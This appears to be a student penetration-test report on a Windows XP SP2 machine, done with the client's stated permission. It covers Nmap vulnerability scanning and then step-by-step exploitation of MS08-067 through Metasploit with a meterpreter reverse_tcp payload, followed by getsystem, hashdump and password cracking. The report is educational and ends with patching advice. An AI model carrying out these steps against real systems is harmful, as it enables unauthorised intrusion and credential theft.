Security Vulnerability Report
Security Vulnerability Report conducted by ICSS student Parag Thakur. The full project discussed below:
Project Name: Security Vulnerability Report
Author Name: Parag Thakur
Publish Date: 05-07-2018
Focus of Assessment:
A network-based assessment of the device which runs Windows XP Professional SP2 platform. There was no Google hacking, password cracking, firewall analysis, social engineering.
Table of Contents
- Table of Contents
- Executive Summary
- Findings and Recommendations
- Gaining Access
The following assessment report was performed in between 5 July’18 to 6 July’18 for the vulnerability assessment of the client running Windows XP Professional SP2 platform. After finding the vulnerability I would the demonstrate the gaining of client’s personal computer access by Metasploit framework. The scan was performed by Network mapper(Nmap) v7.60
The external vulnerability scan is used as a tool to gather data to assess the effectiveness of current security control measures taken at the system level. Further, this data will be used as evidence to support findings and recommendations found in the Security Assessment document. The purpose of the scan was to provide information regarding critical, moderate and low levels vulnerabilities to the client that should be used as a milestone for the client privacy and a level of current industry security architecture.
Nmap (Network Mapper) v7.60– Nmap is a security scanner, originally written by Gordon Lyon, used to discover hosts and services on a computer network, thus building a “map” of the network.
Metasploit Framework by Rapid7– The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Disclaimer: All scans performed were under client’s permission because it subject to privacy leakage and moreover there was the risk of system crash and failure.
Step 1: Performing Nmap fast scan(-F) to 192.168.43.11 with Aggressive(-
- argument and include the NSE(Nmap Scripting Engine) for vulnerability assessment.
Note: Fast Scan would scan 1000 ports by default and with aggressive search, I would know about Service version, OS detection, and trace the route. This would take upto 79.99 seconds to complete, I could optimise the search by suitable optimisation methods which you will find at https://nmap.org/book for e.g., -PN, max-rtt value etc.
Findings and Recommendations:
The following ports (135/tcp, 139/tcp, 445/tcp) were open and they were running the services (msrpc, netbios-ssn, Microsoft-ds) respectively (I have performed the aggressive scan which include OS detection(-O), Service detection(-sV) and traceroute(– traceroute) by default so I could also get the service version details which were laid down below).
|Device Type||General Purpose|
|Operating System||Microsoft Windows XP|2003|
|Traceroute||1 Hop RTT: 1.12ms|
By performing the vulnerability scan to the target IP <192.168.43.11> I would get the following vulnerabilities which are listed below:-
- samba-vuln-cve-2012-1182 : Samba Remote Heap Overflow CVE: CVE-2012-1182
Samba versions 3.6.3 and all versions previous to this are affected by a vulnerability that allows remote code execution as the “root” user from an anonymous connection.
It was false positive and in report it says
NT_STATUS_ACCESS_DENIED which means I had not the administrative privileges. Thus in this case it’s not count on vulnerable.
Microsoft Windows system vulnerable to remote code execution
It allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization.
Here its status was vulnerable so I could go for further process by this major vulnerability in the client’s system.
SMB Remote Memory Corruption Vulnerability CVE: CVE-2010-2550
It allows remote attackers to execute arbitrary code via a crafted SMB packet, aka “SMB Pool Overflow Vulnerability.
It was false positive as it shows false in the report, so this was not the vulnerability in client’s system.
- smb-vuln-ms10-061: CVE: CVE-2010-2729
This vulnerability was used in Stuxnet worm. The script checks for the vuln in a safe way without a possibility of crashing the remote system as this is not a memory corruption vulnerability. In order for the check to work it needs access to at least one shared printer on the remote system. By default it tries to enumerate printers by using LANMAN API which on some systems is not available by default. In that case user should specify printer share name as printer script argument. To find a printer share, smb-enum-shares can be used. Also, on some systems, accessing shares requires valid credentials which can be specified with smb library arguments smbuser and smbpassword.
It was false positive and in the report it says script execution failed so the client’s system was not vulnerable to this issue.
Remote Code Execution vulnerability in Microsoft SMBv1 servers
Risk Factor: HIGH
It allows remote attackers to execute arbitrary code via crafted packets, aka “Windows SMB Remote Code Execution Vulnerability.
It was false positive and by OS detection I came to know that the client’s system runs on Microsoft Window XP|2003 but this vulnerability was for Microsoft SMBv1 Servers and we I was using personal edition, so I could not go for this.
Note: These are the listed vulnerabilities which I found by Nmap Scripting Engine, I could only get into that system by using the smb-vuln-ms08-067 vulnerability having CVE-2008-4250 as stated above.
Step 2: After vulnerability assessment, open terminal and execute Metasploit Framework by using msfconsole command.
Step 3: Search the found vulnerability in the Metasploit modules database which was ms80-067.
This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.
Step 4: After getting the search results, I would use the highlighted (in pictures) module for further process.
Step 5: Set payload to windows/meterpreter/reverse_tcp.
Step 6: Set LHOST to attacker IP <192.168.43.28> and RHOST to victim IP <192.168.43.11>.
Step 7: By show options I would able to see what things I were already set to payloads.
Step 8: By exploit I had entered into the client’s system and client’s privacy is under threat.
Now, I have gained the access of the system and I could do anything whatever I want such as by getsystem we can escalate privilege and become NT Authority user and get hashdump(passwords in encrypted format) and easily crack the password by Jhon the Ripper or else. I can do more thing which will make the client under risk, so kindly fix the issue as soon as possible.
- Patch the system with latest Microsoft security updates to overcome this vulnerability.
- Use a better firewall and IDS that can led attacker to filtered scan results during Nmap scan.
- Maintain the security by weekly or monthly vulnerability assessment.
Highest Selling Technical Courses of Indian Cyber Security Solutions:
Cybersecurity services that can protect your company:
Other Location for Online Courses: